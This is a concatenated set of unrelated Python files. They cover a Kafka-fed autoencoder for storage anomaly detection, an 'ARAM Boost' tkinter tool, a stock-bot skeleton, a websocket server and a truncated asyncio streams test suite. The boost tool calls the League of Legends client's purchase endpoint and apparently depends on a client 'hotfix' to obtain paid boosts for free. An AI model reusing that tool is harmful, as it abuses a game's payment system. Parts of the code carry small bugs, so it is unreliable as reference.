import tensorflow as tf
LOG = log.getLogger(__name__)
CONF = cfg.CONF
data_parser_opts = [
cfg.StrOpt('kafka_bootstrap_servers',
default='localhost:9092',
help='kafka bootstrap server'),
cfg.StrOpt('kafka_topic',
default='delfin-kafka',
help='kafka topic'),
cfg.IntOpt('kafka_retry_num',
default=3,
help='kafka retry num')
]
CONF.register_opts(data_parser_opts, "data_parser")
DATA_ENTRIES_COUNT = 1000
class DataReceiver(base.Base):
def __init__(self, name):
super(DataReceiver, self).__init__()
self._name = name
def run(self):
raise NotImplemented
class DataDictionary:
def __init__(self):
self.dict = {}
def get(self, key):
return self.dict.get(key)
def get(self):
return self.dict
def update(self, key, value):
if key in self.dict.keys():
# sample only DATA_ENTRIES_COUNT
if len(self.dict[key]) >= DATA_ENTRIES_COUNT:
self.dict[key].pop(0)
else:
self.dict[key] = []
LOG.debug("Updating metric for %s with %s", key, value)
self.dict[key].append(value)
def has_key(self, key):
return key in self.dict.keys()
def print(self):
LOG.info(str(self.dict))
def len(self, key):
return len(self.dict[key])
class ModelDictionary:
def __init__(self):
self.dict = {}
def get(self, key):
return self.dict.get(key)
def update(self, key, value):
self.dict[key] = value
def has_key(self, key):
return key in self.dict.keys()
def print(self):
LOG.info(str(self.dict))
class TrainingDictionary:
def __init__(self):
self.dict = {}
def get(self, key):
return self.dict.get(key)
def update(self, key, value):
self.dict[key] = value
def add_entry(self, dict_key, key, value):
dict_val = self.dict[dict_key]
dict_val[key] = value
self.dict[dict_key] = dict_val
def has_key(self, key):
return key in self.dict.keys()
def print(self):
LOG.info(str(self.dict))
data_dictionary = DataDictionary()
model_dictionary = ModelDictionary()
training_dictionary = TrainingDictionary()
TIME_STEPS = 288
# Generated training sequences for use in the model.
def create_sequences(values, time_steps=TIME_STEPS):
output = []
for i in range(len(values) - time_steps):
output.append(values[i : (i + time_steps)])
return np.stack(output)
# Visualize the data
# Timeseries data without anomalies
def create_training_value(key, values):
train_data = {}
for value in values:
val_keys = list(value.keys())[0]
train_data[val_keys] = [value[val_keys]]
train_df = pd.DataFrame.from_dict(train_data, orient='index', columns=['read_bandwidth'])
if training_dictionary.has_key(key):
# if training is already available, case of checking anomaly
train_dict = training_dictionary.get(key)
df_training_value = (train_df - train_dict.get('Mean')) / train_dict.get('STD')
x_train = create_sequences(df_training_value.values)
LOG.info("Training input shape for anomaly detection: %s", x_train.shape)
return x_train
else:
# case for first time training
training_mean = train_df.mean()
training_std = train_df.std()
training_dictionary.update(key, {'Mean': training_mean, 'STD': training_std})
df_training_value = (train_df - training_mean) / training_std
x_train = create_sequences(df_training_value.values)
LOG.info("Training input shape for training: %s", x_train.shape)
return x_train
def create_model(x_train):
"""
## Build a model
We will build a convolutional reconstruction autoencoder model. The model will
take input of shape `(batch_size, sequence_length, num_features)` and return
output of the same shape. In this case, `sequence_length` is 288 and
`num_features` is 1.
"""
model = tf.keras.Sequential(
[
tf.keras.layers.Input(shape=(x_train.shape[1], x_train.shape[2])),
tf.keras.layers.Conv1D(
filters=32, kernel_size=7, padding="same", strides=2, activation="relu"
),
tf.keras.layers.Dropout(rate=0.2),
tf.keras.layers.Conv1D(
filters=16, kernel_size=7, padding="same", strides=2, activation="relu"
),
tf.keras.layers.Conv1DTranspose(
filters=16, kernel_size=7, padding="same", strides=2, activation="relu"
),
tf.keras.layers.Dropout(rate=0.2),
tf.keras.layers.Conv1DTranspose(
filters=32, kernel_size=7, padding="same", strides=2, activation="relu"
),
tf.keras.layers.Conv1DTranspose(filters=1, kernel_size=7, padding="same"),
]
)
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001), loss="mse")
# model.summary()
return model
def training_model(model, x_train):
"""
## Train the model
Please note that we are using `x_train` as both the input and the target
since this is a reconstruction model.
"""
history = model.fit(
x_train,
x_train,
epochs=50,
batch_size=128,
validation_split=0.1,
callbacks=[
tf.keras.callbacks.EarlyStopping(monitor="val_loss", patience=5, mode="min")
],
)
LOG.debug("Loss in training %s ", history.history["loss"])
LOG.debug("Validation loss in training %s ", history.history["val_loss"])
return model
SLEEP_SEC = 60
def process_data_dictionary():
while True:
LOG.info("--------------> Sleeping for %s sec <--------- ", SLEEP_SEC)
time.sleep(SLEEP_SEC)
data_dict = data_dictionary.get()
for key in data_dict:
# Storage ID is key
LOG.info("Processing storage[%s] metrics", key)
# Skip processing if entries less than DATA_ENTRIES_COUNT
if data_dictionary.len(key) < DATA_ENTRIES_COUNT:
LOG.info("Skipping processing as entries are less for storage[%s] len(%s)", key, data_dictionary.len(key))
continue
# Training values
x_train = create_training_value(key, data_dict[key])
if training_dictionary.has_key(key) and 'Threshold' in training_dictionary.get(key).keys():
# get the prediction
x_test_pred = model_dictionary.get(key).predict(x_train)
test_mae_loss = np.mean(np.abs(x_test_pred - x_train), axis=1)
test_mae_loss = test_mae_loss.reshape((-1))
# print anomalies
threshold = training_dictionary.get(key)['Threshold']
anomalies = test_mae_loss > threshold
# Check for anomaly
anomaly = False
for x in anomalies:
if x:
anomaly = True
LOG.warning("Anomaly detected")
break
if not anomaly:
LOG.info("Anomaly not detected")
else:
model = create_model(x_train)
train_model = training_model(model, x_train)
# Update the trained model
model_dictionary.update(key, train_model)
# Get train MAE loss.
x_train_pred = train_model.predict(x_train)
train_mae_loss = np.mean(np.abs(x_train_pred - x_train), axis=1)
# Get reconstruction loss threshold.
threshold = np.max(train_mae_loss)
training_dictionary.add_entry(key, 'Threshold', threshold)
LOG.info("Training loss threshold : %s", threshold)
class KafkaDataReceiver(DataReceiver):
def __init__(self):
super(KafkaDataReceiver, self).__init__(name="kafka")
def consume(self):
consumer = KafkaConsumer(CONF.data_parser.kafka_topic,
bootstrap_servers=CONF.data_parser.kafka_bootstrap_servers,
auto_offset_reset='earliest')
for msg in consumer:
perf = json.loads(msg.value)
# Extract storage_id
storage_id = [elem for elem in perf[0][1].values()][0]
LOG.debug("Adding metric for storage_id : %s", storage_id)
for data in perf:
if data[0] == 'read_bandwidth':
LOG.debug("Data to be updated : %s", [elem for elem in data[2].values()][0])
if [elem for elem in data[2].values()][0] > 100:
LOG.warning("Should detect anomaly for [%s]", storage_id)
data_dictionary.update(storage_id, data[2])
break
def run(self):
retry = CONF.data_parser.kafka_retry_num
for index in range(1, retry+1):
try:
self.consume()
except KeyboardInterrupt:
LOG.info("Bye!")
break
except Exception as e:
if index > retry:
LOG.error('%s\nall retry failed, exit.', e)
raise
else:
LOG.error("%s ,retry %d time(s)", e, index)
else:
break
class Manager(base.Base):
def __init__(self, receiver_name):
super(Manager, self).__init__()
self._receiver = KafkaDataReceiver()
def run(self):
try:
thread = threading.Thread(target=process_data_dictionary)
thread.start()
self._receiver.run()
thread.join()
except Exception as e:
LOG.error("%s ", e)
|
boost.py | # -*- coding: utf-8 -*-
from lcu_driver import Connector
import tkinter as tk
from tkinter import messagebox
import threading, os
__author__: str = "R3nzTheCodeGOD"
__version__: str = "1.0.4"
window = tk.Tk()
client = Connector()
name = ""
buttonClick = False
window.title("ARAM Boost")
window.geometry("300x150")
window.minsize(300, 150)
window.maxsize(400, 200)
window.eval('tk::PlaceWindow . center')
window.configure(bg="#191970")
async def get_name(cmd) -> bool:
summoner = await cmd.request("GET", "/lol-summoner/v1/current-summoner")
if summoner.status == 200:
data: dict = await summoner.json()
global name
name = data['displayName']
status.configure(text=f"Status: Connecting [{name}]", fg="#ffff19")
return True
else: return False
async def boostBAS(cmd) -> None:
req = await cmd.request("POST", "/lol-champ-select/v1/team-boost/purchase")
if req.status == 204:
status.configure(text="Status: Activate Boost", fg="#19ff19")
elif req.status == 500:
status.configure(text="Status: Client hotfix is not applied", fg="#ff1919")
else:
status.configure(text="Status: You are not in champion pick", fg="#ff1919")
window.after(2500, lambda:status.configure(text=f"Status: Connecting [{name}]", fg="#ffff19"))
def click() -> None:
global buttonClick
buttonClick = True
def closeWindow() -> None:
window.destroy()
@client.ready
async def connectLOL(cmd) -> None:
global buttonClick
check = await get_name(cmd)
if check is False:
messagebox.showerror(title="Dick Error", message="There was a problem restart the program")
window.destroy()
while check:
if buttonClick:
await boostBAS(cmd)
buttonClick = False
header = tk.Label(window, text="R3nzTheCodeGOD", font=("Arial", 19), bg="#191970", fg="#ff961f")
header.pack(pady=5, padx=5)
button = tk.Button(window, text="Boost", font=("Arial", 12), bg="#ff961f", fg="#191970", bd=5, activebackground="#197019", activeforeground="#000000", width=10, height=2, command=click)
button.pack(pady=5, padx=5)
status = tk.Label(window, text="Status: waiting LOL...", font=("Arial", 10), bg="#191970", fg="#ffff19")
status.pack(pady=5, padx=5)
prcs = threading.Thread(target=client.start, daemon=True)
prcs.start()
window.protocol("WM_DELETE_WINDOW", closeWindow)
window.mainloop() |
speculbot.py | import yfinance as yf
import requests
from threading import Event, Thread
from yfinance.ticker import Ticker
class BotTicker:
def __init__(self, symbol: str):
self._name = symbol
self._states = [-1]
self._result = -1
def add_state(self, state: int):
self._result = state
self._states.append(state)
@property
def states(self):
return self._states
@property
def name(self):
return self._name
@property
def result(self):
return self._result
@result.setter
def result(self, result: int):
self._result = result
class SpeculBot:
def __init__(self, algo, symbols:str, name="SpeculBot", stop_loss=[]):
self.flag = Event()
# Set stop loss to assigned values
if stop_loss == []:
self.stop_loss_ref = [-0.03 for _ in len(symbols.split())]
else:
self.stop_loss_ref = stop_loss
# API vars
self.num_API_calls = 0
self.symbols = symbols
self.tickers = [BotTicker(s) for s in symbols.upper().split(' ')]
# Class properties
self.name = name
# Algorithm to run
self.algo = algo
# Donnée devant être transmise au contrôleur StockBoy
self.latest_df = None
self._thread = Thread(target=self.run)
def run(self):
while not self.flag.is_set():
continue #TBD
def get_results(self):
history = None
try:
history = self.fetch_data(self.symbols)
except Exception as ex:
if type(ex) is ValueError:
print("Yahoo Finance Backed Error, Attempting to Fix")
elif type(ex) is requests.exceptions.SSLError:
print("Yahoo Finance Backed Error, Attempting to Fix SSL")
else:
print("{err}".format(err=ex))
self.algo(self.tickers, history, stop_loss=self.stop_loss_ref)
return self.tickers
# Cette fonction pourrait être un peu plus spécifique en ce qui concerne l'information "fetché"
def fetch_data(self, symbols):
ticker_data = yf.download(symbols, period="1y", interval="1d")
self.num_API_calls += 1
return ticker_data
def start(self):
self._thread.start()
def stop(self):
self.flag.set()
def is_alive(self):
return self._thread.is_alive()
def join(self):
self._thread.join()
def name(self):
return self.name
def symbols(self):
return self.symbols
|
web_socket_server.py | ## Author: Victor Dibia
## Web socket server. Used to send socket messages to a connected clients.
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
from threading import Thread
import time
retry_threshold = 5
socket_url = "127.0.0.1"
socket_port = 5006
clients = []
class SockerServer(WebSocket):
def handleMessage(self):
for client in clients:
client.sendMessage(self.data)
def handleConnected(self):
print(" > New client connected ",self.address, 'connected')
for client in clients:
client.sendMessage(' - connected')
clients.append(self)
def handleClose(self):
clients.remove(self)
print(self.address, 'closed')
for client in clients:
client.sendMessage(self.address[0] + u' - disconnected')
# def sendMessage():
# print("sending message to ", len(clients), " clients")
# for client in clients:
# client.sendMessage("bingo")
def spinup_server():
print("Starting websocket server")
server = SimpleWebSocketServer('', socket_port, SockerServer)
server.serveforever()
def init(s_port):
socket_port = s_port
thread = Thread(target=spinup_server)
thread.start()
# thread.join()
time.sleep(4)
print("Number of connected clients", len(clients))
|
test_streams.py | """Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test.support import socket_helper
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
def tearDownModule():
asyncio.set_event_loop_policy(None)
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address)
self._basetest_open_connection(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
self.assertEqual(messages, [])
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context())
self._basetest_open_connection_no_loop_ssl(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
self.assertEqual(messages, [])
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address)
self._basetest_open_connection_error(conn_fut)
@socket_helper.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(30))
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(1024))
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = self.loop.create_task(stream.read(-1))
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=0, loop=self.loop)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=-1, loop=self.loop)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = self.loop.create_task(stream.readline())
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.StreamReader(limit=7, loop=self.loop)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.StreamReader(loop=self.loop)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
def test_readuntil_limit_found_sep(self):
stream = asyncio.StreamReader(loop=self.loop, limit=3)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAA', stream._buffer)
stream.feed_data(b'A')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'is found') as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'some dataAAA', stream._buffer)
def test_readexactly_zero_or_less(self):
# Read exact number of bytes (zero or less).
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.readexactly(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
with self.assertRaisesRegex(ValueError, 'less than zero'):
self.loop.run_until_complete(stream.readexactly(-1))
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly(self):
# Read exact number of bytes.
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA + self.DATA, data)
self.assertEqual(self.DATA, stream._buffer)
def test_readexactly_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.readexactly(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readexactly_eof(self):
# Read exact number of bytes (eof).
stream = asyncio.StreamReader(loop=self.loop)
n = 2 * len(self.DATA)
read_task = self.loop.create_task(stream.readexactly(n))
def cb():
stream.feed_data(self.DATA)
stream.feed_eof()
self.loop.call_soon(cb)
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(read_task)
self.assertEqual(cm.exception.partial, self.DATA)
self.assertEqual(cm.exception.expected, n)
self.assertEqual(str(cm.exception),
'18 bytes read on a total of 36 expected bytes')
self.assertEqual(b'', stream._buffer)
def test_readexactly_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readexactly(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readexactly(2))
def test_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertIsNone(stream.exception())
exc = ValueError()
stream.set_exception(exc)
self.assertIs(stream.exception(), exc)
def test_exception_waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
async def set_err():
stream.set_exception(ValueError())
t1 = self.loop.create_task(stream.readline())
t2 = self.loop.create_task(set_err())
self.loop.run_until_complete(asyncio.wait([t1, t2]))
self.assertRaises(ValueError, t1.result)
def test_exception_cancel(self):
stream = asyncio.StreamReader(loop=self.loop)
t = self.loop.create_task(stream.readline())
test_utils.run_briefly(self.loop)
t.cancel()
test_utils.run_briefly(self.loop)
# The following line fails if set_exception() isn't careful.
stream.set_exception(RuntimeError('message'))
test_utils.run_briefly(self.loop)
self.assertIs(stream._waiter, None)
def test_start_server(self):
class MyServer:
def __init__(self, loop):
self.server = None
self.loop = loop
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
sock = socket.create_server(('127.0.0.1', 0))
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client,
sock=sock))
return sock.getsockname()
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
sock = socket.create_server(('127.0.0.1', 0))
addr = sock.getsockname()
sock.close()
self.server = self.loop.run_until_complete(
asyncio.start_server(self.handle_client_callback,
host=addr[0], port=addr[1]))
return addr
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(addr):
reader, writer = await asyncio.open_connection(*addr)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
server = MyServer(self.loop)
addr = server.start()
msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
server = MyServer(self.loop)
addr = server.start_callback()
msg = self.loop.run_until_complete(self.loop.create_task(client(addr)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@socket_helper.skip_unless_bind_unix_socket
def test_start_unix_server(self):
class MyServer:
def __init__(self, loop, path):
self.server = None
self.loop = loop
self.path = path
async def handle_client(self, client_reader, client_writer):
data = await client_reader.readline()
client_writer.write(data)
await client_writer.drain()
client_writer.close()
await client_writer.wait_closed()
def start(self):
self.server = self.loop.run_until_complete(
asyncio.start_unix_server(self.handle_client,
path=self.path))
def handle_client_callback(self, client_reader, client_writer):
self.loop.create_task(self.handle_client(client_reader,
client_writer))
def start_callback(self):
start = asyncio.start_unix_server(self.handle_client_callback,
path=self.path)
self.server = self.loop.run_until_complete(start)
def stop(self):
if self.server is not None:
self.server.close()
self.loop.run_until_complete(self.server.wait_closed())
self.server = None
async def client(path):
reader, writer = await asyncio.open_unix_connection(path)
# send a line
writer.write(b"hello world!\n")
# read it back
msgback = await reader.readline()
writer.close()
await writer.wait_closed()
return msgback
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
# test the server variant with a coroutine as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
self.assertEqual(msg, b"hello world!\n")
# test the server variant with a callback as client handler
with test_utils.unix_socket_path() as path:
server = MyServer(self.loop, path)
server.start_callback()
msg = self.loop.run_until_complete(
self.loop.create_task(client(path)))
server.stop()
